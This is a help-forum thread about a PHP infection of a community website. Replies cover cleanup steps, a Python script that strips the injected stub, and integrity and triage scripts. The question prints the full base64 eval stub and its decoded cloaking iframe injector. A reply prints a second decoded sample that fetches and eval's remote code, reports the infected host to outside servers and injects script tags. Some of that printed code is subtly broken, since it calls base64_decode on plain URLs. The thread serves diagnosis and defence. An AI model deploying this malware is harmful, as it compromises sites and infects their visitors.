My site (a very large community website) was recently infected with a virus. Every index.php
file was changed so that the opening php tag of these files was replaced with the following line:
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY+JzsNCn0='));
When I decoded this, it produced the following PHP code:
<?php
error_reporting(0);   // suppress any PHP error output that could reveal the injection
$bot = FALSE;
// User-Agent substrings that mark crawlers, validators and analysis tools: they never get the iframe
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
// Visitor IP ranges (largely search-engine crawler space) that are likewise served the clean page
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    array("64.68.80.0","64.68.87.255"),
    array("66.102.0.0","66.102.15.255"),
    array("64.233.160.0","64.233.191.255"),
    array("66.249.64.0","66.249.95.255"),
    array("72.14.192.0","72.14.255.255"),
    array("209.85.128.0","209.85.255.255"),
    array("198.108.100.192","198.108.100.207"),
    array("173.194.0.0","173.194.255.255"),
    array("216.33.229.144","216.33.229.151"),
    array("216.33.229.160","216.33.229.167"),
    array("209.185.108.128","209.185.108.255"),
    array("216.109.75.80","216.109.75.95"),
    array("64.68.88.0","64.68.95.255"),
    array("64.68.64.64","64.68.64.127"),
    array("64.41.221.192","64.41.221.207"),
    array("74.125.0.0","74.125.255.255"),
    array("65.52.0.0","65.55.255.255"),
    array("74.6.0.0","74.6.255.255"),
    array("67.195.0.0","67.195.255.255"),
    array("72.30.0.0","72.30.255.255"),
    array("38.0.0.0","38.255.255.255")
);
// Unsigned representation so the range comparison also works on 32-bit PHP builds
$my_ip2long = sprintf("%u", ip2long($_SERVER['REMOTE_ADDR']));
foreach ($stop_ips_masks as $IPs) {
    $first_d = sprintf("%u", ip2long($IPs[0]));
    $second_d = sprintf("%u", ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) { $bot = TRUE; break; }
}
foreach ($user_agent_to_filter as $bot_sign) {
    if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false) { $bot = true; break; }
}
// Only ordinary visitors receive the off-screen iframe pointing at the attacker's site
if (!$bot) {
    echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://lzqqarkl.co.cc/QQkFBwQGDQMGBwYAEkcJBQcEAAcDAAMBBw==" width="2" height="2"></iframe></div>';
}
I've tried several things to clean the virus, even restoring from a backup, and the files get re-infected after a few minutes or hours. So can you please help me?
What do you know about this virus?
Is there a known security hole it uses to install and propagate?
What does the above php code actually do?
What does the page it embeds in the iframe do?
And of course, more importantly: what can I do to get rid of it?
Please help, we have almost run out of ideas and hope :(
UPDATE 1 Some more details. A weird thing is: when we first checked the infected files, they had been changed, but their modified time in the FTP program showed the last access to be days, months or even years ago in some cases! How is this even possible? It drives me crazy!
UPDATE 2 I think the problem started after a user installed a plugin in his WordPress installation. After restoring from backup and completely deleting the WordPress folder and the associated db, the problem seems gone. We have currently subscribed to a security service and they are investigating the issue just to be sure the hack is gone for good. Thanks to anyone who replied.
Steps to recover and disinfect your site (provided you have a known good backup).
You need to basically close the door to your site before you do your remedial work. This will prevent visitors from getting malicious code, seeing error messages, etc. Just good practice.
You should be able to do this by putting the following into your .htaccess file in the webroot. (Replace "!!Your IP Address Here!!" with your own IP address - see http://icanhazip.com if you don't know your IP address.)
order deny,allow
deny from all
allow from !!Your IP Address Here!!
Download everything into a separate folder from your good backups. This may take a while (dependent on your site size, connection speed, etc).
On a Windows machine, you can use WinMerge - http://winmerge.org/ - it's free and quite powerful. On a MacOS machine, check out the list of possible alternatives from Alternative.to
You should end up with a few different results:
(a.k.a "Why can't we all just get along?")
For Files which are Identical, no further action is required.
For Files which Exist on One Side Only, look at the file and figure out whether they are legitimate (ie user uploads which should be there, additional files you may have added, etc.)
For Files which are Different, look at the file (the File Difference Utility may even show you which lines have been added/modified/removed) and see whether the server version is valid. Overwrite (with the backed-up version) any files which contain malicious code.
Whether this is as simple as changing your FTP/cPanel passwords, or reviewing your use of external/uncontrolled resources (as you mention you are performing a lot of fgets, fopens, etc., you may want to check the parameters being passed to them, as that is a way to make scripts pull in malicious code), etc.
Take the opportunity of being the only person looking at the site to make sure that everything is still operating as expected, after the infected files are corrected and malicious files have been removed.
Reverse the changes made in the .htaccess file in Step 1. Watch carefully. Keep an eye on your visitor and error logs to see if anyone tries to trigger the removed malicious files, etc.
There are a few solutions that let you have an automated check performed on your host (using a CRON job) which will detect and detail any changes which occur. Some are a bit verbose (you will get an email for each and every file changed), but you should be able to adapt them to your needs:
Make sure you have scheduled backups performed on your website, and keep a few of them, so you have different points you can go back to in time if necessary. For instance, if you performed weekly backups, you might want to keep the following:
These will always make life easier if you have someone attack your site with something a bit more destructive than a code injection attack.
Oh, and ensure you back up your databases too - with a lot of sites being based on CMSes, having the files is nice, but if you lose/corrupt the database behind them, well, the backups are basically useless.
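The automated change check mentioned above, as an added example that is not the answer's own code: it records a SHA-256 per tracked file and on each run reports files that were added, removed or changed since the baseline. It deliberately ignores mtimes, because a timestamp can be set to any value by whoever can write the file, which is what the question's UPDATE 1 observed; the demo scenario, its file names and the integrity.py command line are constructed for this example.

```python
import hashlib
import json
import os
import sys
import tempfile

TRACKED = (".php", ".htaccess", ".js", ".html")

def hash_file(path):
    """SHA-256 of the file's bytes (content, not mtime, is what the check trusts)."""
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def snapshot(root):
    """Map every tracked file (path relative to root, '/' separators) to its content hash."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(TRACKED):
                full = os.path.join(dirpath, name)
                digests[os.path.relpath(full, root).replace(os.sep, "/")] = hash_file(full)
    return digests

def diff_snapshots(baseline, current):
    """Added, removed and changed files; mtimes are never consulted (they can be forged)."""
    base, cur = set(baseline), set(current)
    return {"added": sorted(cur - base), "removed": sorted(base - cur),
            "changed": sorted(p for p in base & cur if baseline[p] != current[p])}

def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(text)

def demo():
    """Constructed scenario: clean site, then an injected stub whose mtime is rolled back."""
    root = tempfile.mkdtemp()
    _write(os.path.join(root, "index.php"), "<?php\necho 'hello';\n")
    _write(os.path.join(root, "blog", "index.php"), "<?php\necho 'blog';\n")
    baseline = snapshot(root)
    target = os.path.join(root, "index.php")
    _write(target, "<?php eval(base64_decode('QUFB'));\necho 'hello';\n")  # stub replaces <?php
    os.utime(target, (1104537600, 1104537600))  # 2005-01-01: old mtime, as the question reports
    _write(os.path.join(root, "blog", "cache.php"), "<?php\n")  # constructed dropped file
    return diff_snapshots(baseline, snapshot(root))

if __name__ == "__main__":
    # Assumed cron usage: python integrity.py /var/www baseline.json (first run writes the baseline)
    root, store = sys.argv[1], sys.argv[2]
    if os.path.exists(store):
        with open(store) as f:
            print(json.dumps(diff_snapshots(json.load(f), snapshot(root)), indent=2))
    else:
        with open(store, "w") as f:
            json.dump(snapshot(root), f, indent=2)
```

Keep baseline.json outside the web root and regenerate it only after you have verified the tree against a known good backup, otherwise the check would bless the infection.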
I suffered from the same hack job. I was able to decrypt the code as well, and while I got different php code, I started by removing the injected php text by looping through each php file in the site and removing the eval call. I am still investigating how I got it to begin with but here is what mine looked like after decrypting from this website:
To decode the encrypted php script on each php file use this: http://www.opinionatedgeek.com/dotnet/tools/base64decode/
And format the result using this one: http://beta.phpformatter.com/
To clean you need to remove the "eval" line from the top of each php file, and delete the .log folders from the base folder of the website.
I found a python script which I modified slightly to remove the trojan from php files, so I will post it here for others to use. Code source from thread: replace ALL instances of a character with another one in all files hierarchically in directory tree
import os
import re
import sys

replace_extensions = True  # only touch .php files (the original left this flag undefined)

def try_to_replace(fname):
    if replace_extensions:
        return fname.lower().endswith(".php")
    return True

def file_replace(fname, pat, s_after):
    # first, see if the pattern is even in the file.
    with open(fname) as f:
        if not any(re.search(pat, line) for line in f):
            return  # pattern does not occur in file so we are done.
    # pattern is in the file, so perform replace operation.
    with open(fname) as f:
        out_fname = fname + ".tmp"
        out = open(out_fname, "w")
        for line in f:
            out.write(re.sub(pat, s_after, line))
        out.close()
    os.rename(out_fname, fname)

def mass_replace(dir_name, s_before, s_after):
    pat = re.compile(s_before)
    for dirpath, dirnames, filenames in os.walk(dir_name):
        for fname in filenames:
            if try_to_replace(fname):
                print("cleaning: " + fname)
                fullname = os.path.join(dirpath, fname)
                file_replace(fullname, pat, s_after)

if len(sys.argv) != 2:
    u = "Usage: rescue.py <dir_name>\n"
    sys.stderr.write(u)
    sys.exit(1)

# Remove the injected eval(base64_decode('...')); stub. The base64 blob never contains a dot,
# so [^.]* runs up to the stub's closing "));".
mass_replace(sys.argv[1], r"eval\(base64_decode\([^.]*\)\);", "")
To use it, type:
python rescue.py rootfolder
This is what the malicious script was trying to do:
<?php
if (function_exists('ob_start') && !isset($_SERVER['mr_no'])) {
    $_SERVER['mr_no'] = 1;   // guard so the injected code runs once per request
    if (!function_exists('mrobh')) {
        // Fetch a URL with whichever HTTP client the host allows (curl, file(), fopen wrappers, raw sockets)
        function get_tds_777($url) {
            $content = "";
            $content = @trycurl_777($url);
            if ($content !== false) return $content;
            $content = @tryfile_777($url);
            if ($content !== false) return $content;
            $content = @tryfopen_777($url);
            if ($content !== false) return $content;
            $content = @tryfsockopen_777($url);
            if ($content !== false) return $content;
            $content = @trysocket_777($url);
            if ($content !== false) return $content;
            return '';
        }
        function trycurl_777($url) {
            if (function_exists('curl_init') === false) return false;
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            $result = curl_exec($ch);
            curl_close($ch);
            if ($result == "") return false;
            return $result;
        }
        function tryfile_777($url) {
            if (function_exists('file') === false) return false;
            $inc = @file($url);
            $buf = @implode('', $inc);
            if ($buf == "") return false;
            return $buf;
        }
        function tryfopen_777($url) {
            if (function_exists('fopen') === false) return false;
            $buf = '';
            $f = @fopen($url, 'r');
            if ($f) {
                while (!feof($f)) { $buf .= fread($f, 10000); }
                fclose($f);
            } else return false;
            if ($buf == "") return false;
            return $buf;
        }
        function tryfsockopen_777($url) {
            if (function_exists('fsockopen') === false) return false;
            $p = @parse_url($url);
            $host = $p['host'];
            $uri = $p['path'] . '?' . $p['query'];
            $f = @fsockopen($host, 80, $errno, $errstr, 30);
            if (!$f) return false;
            $request = "GET $uri HTTP/1.0\n";
            $request .= "Host: $host\n\n";
            fwrite($f, $request);
            $buf = '';
            while (!feof($f)) { $buf .= fread($f, 10000); }
            fclose($f);
            if ($buf == "") return false;
            list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);  // strip HTTP headers
            return $buf;
        }
        function trysocket_777($url) {
            if (function_exists('socket_create') === false) return false;
            $p = @parse_url($url);
            $host = $p['host'];
            $uri = $p['path'] . '?' . $p['query'];
            $ip1 = @gethostbyname($host);
            $ip2 = @long2ip(@ip2long($ip1));
            if ($ip1 != $ip2) return false;
            $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            if (!@socket_connect($sock, $ip1, 80)) { @socket_close($sock); return false; }
            $request = "GET $uri HTTP/1.0\n";
            $request .= "Host: $host\n\n";
            socket_write($sock, $request);
            $buf = '';
            while ($t = socket_read($sock, 10000)) { $buf .= $t; }
            @socket_close($sock);
            if ($buf == "") return false;
            list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
            return $buf;
        }
        // Refresh the cached domain list from the remote servers; a "|||CODE|||" suffix carries
        // base64 PHP that is eval'd here, so the attacker can change the payload remotely
        function update_tds_file_777($tdsfile) {
            $actual1 = $_SERVER['s_a1'];
            $actual2 = $_SERVER['s_a2'];
            $val = get_tds_777($actual1);
            if ($val == "") $val = get_tds_777($actual2);
            $f = @fopen($tdsfile, "w");
            if ($f) { @fwrite($f, $val); @fclose($f); }
            if (strstr($val, "|||CODE|||")) {
                list($val, $code) = explode("|||CODE|||", $val);
                eval(base64_decode($code));
            }
            return $val;
        }
        // Pick a random domain from the cached list (refreshed every s_t1 seconds), else the default
        function get_actual_tds_777() {
            $defaultdomain = $_SERVER['s_d1'];
            $dir = $_SERVER['s_p1'];
            $tdsfile = $dir . "log1.txt";
            if (@file_exists($tdsfile)) {
                $mtime = @filemtime($tdsfile);
                $ctime = time() - $mtime;
                if ($ctime > $_SERVER['s_t1']) {
                    $content = update_tds_file_777($tdsfile);
                } else {
                    $content = @file_get_contents($tdsfile);
                }
            } else {
                $content = update_tds_file_777($tdsfile);
            }
            $tds = @explode("\n", $content);
            $c = @count($tds) + 0;
            $url = $defaultdomain;
            if ($c > 1) { $url = trim($tds[mt_rand(0, $c - 2)]); }
            return $url;
        }
        function is_mac_777($ua) {
            $mac = 0;
            if (stristr($ua, "mac") || stristr($ua, "safari"))
                if ((!stristr($ua, "windows")) && (!stristr($ua, "iphone"))) $mac = 1;
            return $mac;
        }
        function is_msie_777($ua) {
            $msie = 0;
            if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") || stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9")) $msie = 1;
            return $msie;
        }
        // Choose a writable cache dir (.logs under the web root, the folder the answer says to delete,
        // else /tmp) and flag the visitor as a bot unless the browser is IE 6-9 or Mac/Safari
        function setup_globals_777() {
            $rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
            $mz = "/tmp/";
            if (!@is_dir($rz)) {
                @mkdir($rz);
                if (@is_dir($rz)) {
                    $mz = $rz;
                } else {
                    $rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
                    if (!@is_dir($rz)) {
                        @mkdir($rz);
                        if (@is_dir($rz)) { $mz = $rz; }
                    } else {
                        $mz = $rz;
                    }
                }
            } else {
                $mz = $rz;
            }
            $bot = 0;
            $ua = $_SERVER['HTTP_USER_AGENT'];
            if (stristr($ua, "msnbot") || stristr($ua, "Yahoo")) $bot = 1;
            if (stristr($ua, "bingbot") || stristr($ua, "google")) $bot = 1;
            $msie = 0;
            if (is_msie_777($ua)) $msie = 1;
            $mac = 0;
            if (is_mac_777($ua)) $mac = 1;
            if (($msie == 0) && ($mac == 0)) $bot = 1;
            global $_SERVER;
            $_SERVER['s_p1'] = $mz;
            $_SERVER['s_b1'] = $bot;
            $_SERVER['s_t1'] = 1200;
            $_SERVER['s_d1'] = base64_decode('http://ens122zzzddazz.com/');
            // The infected host, script path and browser are reported to the remote servers
            $d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" . urlencode($_SERVER["PHP_SELF"]) . "&a=" . urlencode($_SERVER["HTTP_USER_AGENT"]);
            $_SERVER['s_a1'] = base64_decode('http://cooperjsutf8.ru/g_load.php') . $d;
            $_SERVER['s_a2'] = base64_decode('http://nlinthewood.com/g_load.php') . $d;
            $_SERVER['s_script'] = "nl.php?p=d";
        }
        setup_globals_777();
        if (!function_exists('gml_777')) {
            // The remote <script> tag, built only for visitors not flagged as bots
            function gml_777() {
                $r_string_777 = '';
                if ($_SERVER['s_b1'] == 0) $r_string_777 = '<script src="' . get_actual_tds_777() . $_SERVER['s_script'] . '"></script>';
                return $r_string_777;
            }
        }
        if (!function_exists('gzdecodeit')) {
            // Unwrap gzip-compressed page output so the tag can be spliced into it
            function gzdecodeit($decode) {
                $t = @ord(@substr($decode, 3, 1));
                $start = 10;
                $v = 0;
                if ($t & 4) {
                    $str = @unpack('v', substr($decode, 10, 2));
                    $str = $str[1];
                    $start += 2 + $str;
                }
                if ($t & 8) { $start = @strpos($decode, chr(0), $start) + 1; }
                if ($t & 16) { $start = @strpos($decode, chr(0), $start) + 1; }
                if ($t & 2) { $start += 2; }
                $ret = @gzinflate(@substr($decode, $start));
                if ($ret === FALSE) { $ret = $decode; }
                return $ret;
            }
        }
        // Output-buffer callback: inject the script tag just before </body> of every page served
        function mrobh($content) {
            @Header('Content-Encoding: none');
            $decoded_content = gzdecodeit($content);
            if (preg_match('/\<\/body/si', $decoded_content)) {
                return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1', $decoded_content);
            } else {
                return $decoded_content . gml_777();
            }
        }
        ob_start('mrobh');
    }
}
?>
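As an added example that is not code from this answer or from the thread, the following Python decodes each eval(base64_decode('...')) stub statically, the same stub the rescue script above matches, and instead of deleting it reports what the payload does: which URLs it references, whether it injects an iframe or script, and whether it cloaks by User-Agent or client IP the way the code in the question does. The sample file, its payload and the malicious.example domain are constructed for the demo.

```python
import base64
import re

# One injected stub per match: eval(base64_decode('<payload>'));  whitespace inside the
# base64 is tolerated because the blob in the question was wrapped across lines.
STUB_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*;?")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

def decode_stubs(php_source):
    """Return the decoded payload of every stub found, decoded statically (never eval'd)."""
    payloads = []
    for m in STUB_RE.finditer(php_source):
        raw = re.sub(r"\s+", "", m.group(1))
        try:
            payloads.append(base64.b64decode(raw, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError: not real base64, still suspicious
            payloads.append(None)
    return payloads

def triage(payload):
    """Indicators a responder wants from the decoded stub before deciding what to block."""
    low = payload.lower()
    return {
        "urls": sorted(set(URL_RE.findall(payload))),
        "injects_iframe": "<iframe" in low or "<script" in low,
        "cloaks_by_user_agent": "http_user_agent" in low,
        "cloaks_by_client_ip": "remote_addr" in low,
        "hides_errors": "error_reporting(0)" in low,
        "nested_eval": "eval(" in low,  # payload that pulls in a second stage
    }

# Constructed sample shaped like the stub in the question; the domain is a placeholder.
SAMPLE_PAYLOAD = (
    "error_reporting(0);\n"
    "$bot = FALSE;\n"
    "if (strpos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false) { $bot = true; }\n"
    "if (ip2long($_SERVER['REMOTE_ADDR']) >= ip2long('66.249.64.0')) { $bot = true; }\n"
    "if (!$bot) { echo '<div style=\"position: absolute; left: -1999px;\">"
    "<iframe src=\"http://malicious.example/landing\" width=\"2\" height=\"2\"></iframe></div>'; }\n"
)
SAMPLE_FILE = ("<?php eval(base64_decode('"
               + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode() + "'));\n"
               "// the site's own code followed the stub unchanged\n"
               "echo 'welcome';\n")

def scan_source(php_source):
    """Triage every stub in one file's source; None marks an undecodable stub."""
    return [triage(p) if p is not None else None for p in decode_stubs(php_source)]

if __name__ == "__main__":
    import json
    print(json.dumps(scan_source(SAMPLE_FILE), indent=2))
```

Run scan_source over every .php file (for example with the os.walk loop from the rescue script) before cleaning, so the URLs it reports can be blocked at the proxy and searched for in the access logs.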